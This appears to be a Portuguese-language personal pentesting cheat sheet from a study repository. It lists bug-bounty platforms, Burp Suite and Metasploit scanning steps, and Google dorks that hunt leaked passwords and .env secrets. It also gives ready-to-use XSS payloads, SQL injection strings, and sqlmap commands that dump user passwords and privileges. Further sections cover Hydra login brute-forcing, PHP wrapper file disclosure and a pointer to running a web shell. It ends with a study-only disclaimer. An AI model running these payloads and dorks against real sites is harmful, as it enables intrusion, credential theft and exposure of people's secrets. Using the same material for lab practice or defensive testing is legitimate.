- Port Swigger
- Hackerone
- Bugcrowd
- Bug Bounty
- Intigriti
- Open Bug Bounty
- Tryhackme
- Máquinas vulneráveis para teste
-
user = kali senha = kali
-
Burp Suite - Interceptação de requests
-
Extensão Cookie Manager - Verificar e editar cookies de sites
-
Extensão Wappalyzer - Verificar tecnologias em sites
-
OSINT - Coletar informações de fontes abertas
-
wapiti - scanear sites e gerar relatórios
Quando usar o Burp Suite configurar o navegador com o prox: 127.0.0.1 e adicionar o certificado do http:https://burp
- F-droid: Termux: Aplicativo para acesso ao root Android
- Para executar:
python3 captcha_de_equacao.py
-
Instale o tesseract-ocr - que é uma ferramenta de reconhecimento óptico de caracteres que usa inteligência artificial, com o comando:
sudo apt-get install tesseract-ocr
-
Entre dentro da pasta onde está os arquivos de usuários e senhas. E para executar, rode o comando no terminal:
bash ocr.sh
- Framework para verificar a segurança em aplicações web e redes. Documentação
-
Acesse o Metasploit na aba 8 - Explotation Tools
-
Usando comandos auxiliares, digite o comando:
use auxiliary
- Vá navegando nas pastas:
use auxiliary/scanner/http
- Chegando no arquivo fim, rode o comando, para verificar as opções de exploração:
show options
- Nas opções: RHOSTS indicaremos o host, então digite o comando:
set RHOSTS IP_DO_HOST (Para verificar o IP, basta pingar a página)
- No TARGETURI / indicaremos uma pasta
set TARGETURI /joomal
- Para rodar o scaneamento, digite o comando:
run
- Para voltar ao inicio, digite o comando:
back
- Para scannear diretórios através de uma brute force:
use auxiliary/scanner/http/brute_dirs
- Veja as opções de exploração e set o host e o root:
set PATH /pasta_da_aplicacao
set RHOSTS IP_do_HOST
- Depois execute o scaneamento:
run
- É um plugin do Metasploit que faz uma varredura por todas as vulnerabilidades de uma aplicação web. Para executá-lo, basta executar no terminal do Metasploit:
load wmap
- Depois precisamos criar o site para ele fazer a busca:
wmap_sites -a IP_DO_SITE
- Para indicar a página da aplicação (target uri) em que vamos realizar a busca:
wmap_targets -t http:https://IP_DO_SITE/pasta_raiz_da_aplicação/
- Para executar o scaner:
wmap_run -t
Esse processo é um pouco demorado, pois ele faz uma varredura por toda aĺicação
- Para executar todos os módulos que ele retorna:
wmap_run -e
É um processo que demora um pouco também
site:pastebin.com OR site:paste2.org intext:EMAIL intext:PASSWORD | SENHA
filetype:doc "senha" intext:@gmail.com | @hotmail.com | @yahoo.com | @uol.com
filetype:txt "senha" intext:@gmail.com | @hotmail.com | @yahoo.com | @uol.com
filetype:doc | filetype:docx | filetype:txt | filetype:xls | filetype:pdf
"a senha é" intext:@gmail.com | @hotmail.com | @yahoo.com
filetype:env intext:DB_PASSWORD | intext:AWS_SECRET_ACCESS_KEY | intext:MAIL_PASSWORD | intext:API_SECRET
Devido ao quantidade de pesquisas, você pode tomar um strike do google temporariamente
- XSS persistido, inserido em uma textarea, para mostrar uma imagem como comentário
<script>
document.body.innerHTML="";
var imagem=new Image();
imagem.src="url_da_imagem";
document.body.appendChild(imagem);
</script>
- XSS na url
<img src="/resources/images/tracker.gif?searchTerms="" <svg onload=alert(1)> // ">
- Sabendo apenas o nome do usuário, e ignorando a senha:
administrator'--
- Passando Sql Inject pela url para retornar os usuários e senhas na página:
category=produto' UNION SELECT username, password FROM users --
- Irá mostrar todos os bancos de dados que a aplicação trabalha
sqlmap -u https://www.ecommerce.com --dbs
- Para explorar as tabelas de um banco na aplicação
sqlmap -u https://www.ecommerce.com -D nome_do_banco tables
- Para explorar uma tabelas no banco na aplicação
sqlmap -u https://ecommerce.com.br/?filter/caterory=product -T nome_da_tabela --columns
- Ver dados de registros de uma tabela no banco
sqlmap -u https://www.ecommerce.com/filter?category=product -D nome_do_banco -T nome_da_tabela --columns "campo1, campo2" --dump
- Para ver os dados dos adminstradores do banco e seus privilegios
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges
- Melhorando a performance da consulta acima com as flags batch (para passar em todas perguntas) e threads (para limitar as requesições):
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges --batch --threads 5
- Quando se conhece o banco, pode-se ainda acelerar mais o desempenho da consulta
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges --batch --threads 5 --dmbs tecnologia_do_banco
- Para testar todos os parâmetros da aplicação, quando não se passa nenhum filtro:
sqlmap -u https://www.ecommerce.com/ --crawl=2 --batch
9.Esse exemplo está passando uma url com parâmetro para o sqlmap a fim de baixar os dados da base de dados mutillidae, tabela accounts e colunas username, password e is_admin para visualizar os dados de usuários, senhas e administrador
sqlmap -u "http:https://10.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=123456&user-info-php-submit-button=View+Account+Details" --batch --dbms mysql --os linux --threads 3 -D mutillidae -T accounts -C "username,password,is_admin" --dump
- Descobrindo usuários cadastrados com a ferramenta Hydra
- Na pasta onde estiver seu arquivo de usuários .txt abra um terminal e digite o comando:
hydra -L users.txt -p senha-qualquer "localhost" http-form-post "/labs/bruteforce1/index.php:username=^USER^&password=^PASS^:S=Senha incorreta"
- A ferramenta hydra vai testar se cada usuário do arquivo users.txt é válido para aquele formulário passando uma senha-qualquer.
- Descorbindo a senha cadastrada com o usuário correto:
hydra -l usuario_correto -P passwords.txt "localhost" http-form-post "/labs/bruteforce1/index.php:username=^USER^&password=^PASS^:Senha incorreta"
O maiúsculo das letras indica onde será feito a busca dinâmicamente
-
Trazendo o código de uma página php, através do PHP Wrapper.
-
Coloque o endereço IP do site mais o conteúdo:
http:https://IP_DO_SITE/?page=php:https://filter/convert.base64-encode/resource=config
-
A página retornará um token.
-
Utilize o Burp Suite, para decifrar esse token, através do decode.
-
Cole o token, e escolha a opção Decode as Base64
-
Para acessar o banco da aplicação:
mysql -h ENDEREÇO_DE_IP -u root -p
-
Para ver o banco de dados da aplicação:
show databases;
-
Acessar a base de dados dos usuários:
use Users;
-
Para verificar quantas tabelas existem nessa base de dados:
show tables;
-
Listando tudo na tabela:
select * from nome_da_tabela;
-
Para desencriptar as senhas, use o decoder do Burp suite.
-
Após conseguir fazer login na página, é o momento de executar um web shell.
- Segue o check list de Tushar Verma
- Técnicas de Invasão
- Hacker, entre a luz e as trevas
- Manual Completo do Debian Linux
- Fundamentos Ethical Hacking
- Droid Hacking
- Segredos do Hacker Ético
- Outras
- Mais
- Esse repositório, uso apenas para fins de estudos em ambientes controlados.
- Ou nas minhas aplicações para verificar a segurança.
- Não me responsabilizo por ações de terceiros